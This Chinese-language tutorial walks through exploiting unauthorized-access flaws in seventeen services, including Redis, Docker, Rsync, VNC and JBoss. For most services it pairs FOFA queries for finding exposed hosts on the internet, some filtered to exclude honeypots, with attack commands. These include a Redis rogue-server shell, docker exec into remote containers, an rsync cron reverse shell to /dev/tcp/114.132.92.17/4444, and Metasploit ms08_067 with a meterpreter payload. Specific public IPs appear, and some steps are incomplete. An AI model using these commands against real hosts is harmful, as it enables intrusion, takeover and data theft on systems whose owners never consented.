未授权访问
一、Redis未授权访问漏洞
1.下载vulhub到靶机中
2.进⼊⽬录:cd /vulhub-master/redis/4-unacc
3.启动:docker-compose up -d
4.检查:docker ps
5.再攻击的kali机器上安装redis程序进⾏服务的链接
6.安装redis
apt-get install redis
7.redis链接
redis-cli -h 124.221.58.83 -p 6379
8.下载以下攻击项⽬
https://github.com/n0b0dyCN/redis-rogue-server
9.使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊ i 键会获取 Shell环境
python3 redis-rogue-server.py --rhost 靶机IP --lhost 靶机IP
二.Zookeeper未授权访问漏洞
1.使用佛法语句进行寻找漏洞
port="2181" && "Zookeeper" && country="US"
2.在Kali中使⽤以下命令进⾏未授权访问漏洞测试
echo envi | nc ip 端⼝
3.接下来就可以使用zookeeper工具进行连接
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
三、Jenkins未授权访问漏洞
1.使用fofa语句进行资产的搜索
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
2.依次进行点击
3.然后输入以下内容
四、Jupyter NoteBook未授权访问漏洞
1.通过以下fofa语法进⾏产品搜索
"Jupyter Notebook" && port="8888" && "terminals"
2.有漏洞的直接点击即可,然后如图所创建一个新窗口
3.如此就可以执行任意命令
五、Elasticsearch未授权访问漏洞
1.搜索语句为
"Elasticsearch" && port="9200"
2.直接访问即可
六、Docker Remote API未授权访问漏洞
1.搜索语句为
port="2375" && "docker"
2.拼接路径/info,/version
3.使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。
docker -H tcp://ip:2375 ps
docker -H tcp://ip:2375 version
docker -H tcp://ip:2375 exec -it 1f4 /bin/bash
七、Kubernetes Api Server未授权访问漏洞
1.用语句进行搜索
port="8080" && app="Kubernetes"
2.目标在打开的网页中直接访问 8080 端口会返回可用的API列表
八、Hadoop未授权访问漏洞
1.用语句进行搜索
port="8088" && app="Hadoop"
2.打开网站之后不用进行验证,可以直接访问
九、ActiveMQ未授权访问漏洞
1.用语句进行搜索
body="ActiveMQ" && port="8161"
2.输入默认密码admin/admin
十、RabbitMQ未授权访问漏洞
1.用语句进行搜索
port="15672"
port="15692"
port="25672"
2.然后进行登录,登录的密码都是guest
十一、JBoss未授权访问漏洞
1.语句进行搜索
title="Welcome to JBoss" && icon_hash="-656811182"
2.拼接以下路径且无需认证直接进入控制页面
http://ip:port/jmx-console/
http://61.0.111.119:8080/jmx-console/
十二、Ldap未授权访问漏洞
1.语句搜索
port="389"
2.进行工具下载,连接如下
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/
3.用工具进行连接,测试成功即代表有漏洞
十三、Rsync未授权访问漏洞
1.使用语句进行搜索
(port="873") && (is_honeypot=false && is_fraud=false)
2.nmap扫描,上传下载文件
nmap -p 873 --script rsync-list-modules ipaddress建立连接并下载文件
rsync rsync://124.221.58.83:873/
rsync rsync://124.221.58.83:873/src/下载文件
rsync rsync://IP:port/src/etc/passwd ⽬标路径上传文件
rsync 文件地址 rsync://124.221.58.83:873/src/home/
3.然后就可以进行反弹shell
查看定时文件
rsync rsync://124.221.58.83:873/src/etc/crontab下载定时任务文件
rsync rsync://124.221.58.83/src/etc/crontab /tmp/tmp/crontab.txt创建shell文件
#!/bin/bash
/bin/bash -i >& /dev/tcp/114.132.92.17/4444 0>&1更改权限
chmod 777 shell上传shell到目标靶机
rsync /tmp/shell rsync://124.221.58.83:873/src/etc/cron.hourly攻击机监听
nc -lvp 4444
十四、VNC未授权访问漏洞
1.使用语句进行搜索资产
(port="5900") && (is_honeypot=false && is_fraud=false)
2.使用msfconsole打开msf6 的命令行
# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit
3.然后进行vnc的连接
vncviewer ipaddress
十五、Dubbo未授权访问漏洞
1.使用语句进行搜索资产
(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)
2.使用telnet进行连接测试
telnet ip 端口
十六、NSF共享⽬录未授权访问
1.使用语句进行搜索资产
"nfs"
2.依次输入以下语句,进行复现
安装 nfs 客户端
apt install nfs-common查看共享目录
showmount -e ip挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt卸载目录
umount /mnt
十七、Druid未授权访问漏洞
1.使用语句进行搜索资产
title="Druid Stat Index"
2.然后直接访问即可